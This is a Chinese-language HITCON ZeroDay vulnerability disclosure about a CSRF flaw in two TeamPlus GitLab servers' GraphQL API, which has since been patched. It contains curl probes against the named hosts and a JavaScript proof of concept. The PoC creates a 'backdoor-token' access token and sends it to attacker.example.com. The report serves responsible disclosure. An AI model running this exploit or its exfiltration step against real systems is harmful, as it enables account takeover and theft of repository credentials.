Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00629
- Vendor: 互動資通股份有限公司
- Title: 互動資通 TeamPlus GitLab 17.11.7-ee CVE-2026-3857 GraphQL CSRF — 對已認證開發者執行任意操作,帳號接管
- Introduction: R&D 部門的兩個 GitLab 伺服器執行受 CVE-2026-3857 影響的版本,GraphQL API 缺乏 CSRF 保護,可導致帳號接管及供應鏈攻擊。
處理狀態
目前狀態
公開
Last Update : 2026/08/05
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2026/05/05 23:05:49 : 新提交 (由 罐頭 更新此狀態)
- 2026/05/09 17:53:27 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:47:34 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:47:34 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:47:34 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/02 17:31:14 : 已修補 (由 組織帳號 更新此狀態)
- 2026/07/05 03:00:14 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2026/07/06 11:21:47 : 延期申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/08 15:11:11 : 延期申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/29 12:07:43 : 複測申請中 (由 組織帳號 更新此狀態)
- 2026/08/01 14:46:52 : 確認已修補 (由 罐頭 更新此狀態)
- 2026/08/05 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00629
- 通報者:guan4tou2 (罐頭)
- 風險:中
- 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)
參考資料
攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://rd-gitlab.teamplus.com.tw
https://rd3-gitlab.teamplus.com.tw
https://rd3-gitlab.teamplus.com.tw
敘述
互動資通 R&D 部門使用的兩個 GitLab 版本控制伺服器(rd-gitlab.teamplus.com.tw 及 rd3-gitlab.teamplus.com.tw),均執行受 CVE-2026-3857 影響的版本(GitLab CE/EE 17.10 → before 18.8.7)。
此漏洞源自 GitLab GraphQL API(/api/graphql)缺乏充分的 CSRF token 驗證機制。攻擊者可建立惡意網頁,誘導已登入的 R&D 開發人員造訪,瀏覽器將自動附帶 session cookie,使惡意 GraphQL mutation 以 victim 的身份執行。
GitLab 已於 2026 年 3 月 25 日在版本 18.8.7、18.9.3、18.10.1 中修補此漏洞。互動資通的 GitLab 實例至今未更新,仍處於易受攻擊狀態。
步驟 1:確認 GraphQL 端點可存取且無 CSRF 保護
# unauthenticated introspection(無需登入,無需 CSRF token)
curl -s -X POST "https://rd-gitlab.teamplus.com.tw/api/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"{ __typename }"}'
# → {"data":{"__typename":"Query"
# 列舉可用 mutation 數量
curl -s -X POST "https://rd-gitlab.teamplus.com.tw/api/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { mutationType { fields { name } } } }"}' \
| python3 -c "import sys,json; d=json.load(sys.stdin); print(len(d['data']['__schema']['mutationType']['fields']),'mutations')"
# → 305 mutations
步驟 2:確認 mutation 請求被接受(非 CSRF 拒絕)
# 嘗試 createIssue mutation(不帶 X-CSRF-Token)
# 預期 CSRF 保護應回 403/422;但實際伺服器回 auth 錯誤(表示請求被處理)
curl -s -X POST "https://rd-gitlab.teamplus.com.tw/api/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"mutation { createIssue(input:{projectPath:\"test\",title:\"t\"}) { errors } }"}'
# → {"errors":[{"message":"The resource that you are attempting to access does not exist or you don't have permission..."}]}
# ← 回傳 auth 錯誤,非 CSRF 拒絕 → 確認無 CSRF 保護
步驟 3:CSRF 攻擊 PoC(需目標造訪惡意頁面)
<!-- malicious_page.html -->
<script>
fetch('https://rd-gitlab.teamplus.com.tw/api/graphql', {
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
query: `mutation {
personalAccessTokenCreate(input: {
name: "backdoor-token",
scopes: ["api", "read_repository", "write_repository"]
}) {
token { token }
errors
}
}`
})
}).then(r => r.json()).then(d => {
// 將 token 回傳至攻擊者控制的伺服器
fetch('https://attacker.example.com/collect?t=' + encodeURIComponent(JSON.stringify(d)));
});
</script>
當已登入的 R&D 開發人員造訪此頁面,personalAccessTokenCreate mutation 將以其身份執行,攻擊者取得該開發者帳號的長期 API token(含 write_repository 權限)。
修補建議
1. 立即:升級至 GitLab 18.8.7+ / 18.9.3+ / 18.10.1+。
2. 立即緩解:將兩個 GitLab 實例移至 VPN 後方(限制公網存取)。
3. 短期:稽核 GitLab access log,確認有無可疑跨來源 GraphQL 請求。
4. 短期:確認所有 Personal Access Token 有效性,撤銷可疑 token。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。